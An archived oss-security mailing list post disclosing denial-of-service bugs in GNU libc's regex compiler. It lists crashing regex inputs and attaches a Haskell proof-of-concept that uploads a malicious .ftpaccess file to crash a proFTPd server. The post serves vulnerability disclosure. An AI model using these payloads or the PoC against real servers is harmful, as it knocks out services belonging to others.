Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 9 Feb 2017 14:24:58 -0300
From: Gustavo Grieco <gustavo.grieco@...il.com>
To: oss-security@...ts.openwall.com, Agustin Mista <mista.agustin@...il.com>
Subject: Multiple DoS parsing and executing extended regex expressions in GNU libc

Hello,

We found a few extended regex expressions in GNU libc that will crash or
abort the execution of regcomp or regexec. For instance:

\a?{1,32767}

will immediately exhaust the stack calling calc_eclosure_iter in the
compilation. A small variation of this regex is:

\a?{0,32767}

will consume a very large amount of memory: it seems to eat 16GB in less
than a minute. It is also possible to exhaust the stack memory trying to
parse:

(((((((( ... repeated 15000 times

this issue is caused because regcomp will call the parse_expression,
parse_branch and parse_reg_exp functions over and over again.
Finally, the following regex will trigger an abort or invalid free when
regexec is called:

/S^^|\0|()//S^^|\0|()//S^^|\1|()/

I don't think these issues can be used to execute arbitrary code, but it
seems quite easy to produce a DoS if a remote application is parsing
untrusted regex expressions.
In fact, we asked one of our students, Agustín Mista, to create a simple PoC
to show how to crash a proFTP server if you can write a .ftpaccess file.
You can find the script attached.

These issues were tested in GNU libc 2.19 (Ubuntu 14.04) and 2.24 (ArchLinux).

I think it should affect the last version of GNU libc as well. Can someone
confirm it?

I'm investigating how to submit these issues in the new CVE form...


Regards,
Gustavo.

[ CONTENT OF TYPE text/html SKIPPED ]

#!/usr/bin/env stack 
-- stack runghc --resolver lts-7.0 --system-ghc --package ftphs
--
-- Multiple denegation of service in regcomp
-- glibc <= 2.25
--
-- This PoC can disturb proFTPd when compiled without
-- pcre support. It requires a valid user with
-- upload permissions.
--
-- by A. Mista.
--
-- For testing purposes only. Do no harm.

import System.Environment
import System.IO
import Network.FTP.Client
import Control.Exception

handler :: SomeException -> IO ()
handler _ = putStrLn "[+] It's dead, Jim"

main = do
    args <- getArgs
    case args of
        [addr, user, pass] -> do 
            putStrLn "[+] Connecting to the ftp server and login"
            conn <- easyConnectFTP addr
            login conn user (Just pass) Nothing
            putStrLn "[+] Sending the mighty regex"
            putbinary conn ".ftpaccess" "HideFiles \"\\a?{1,32767}\"\n"
            putStrLn "[+] Triggering the server to parse .ftpaccess"
            catch (dir conn Nothing >> putStrLn "[-] Not affected") handler
        _ -> putStrLn "USAGE: ./PoC.hs [ADDRESS] [USER] [PASSWORD]"

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ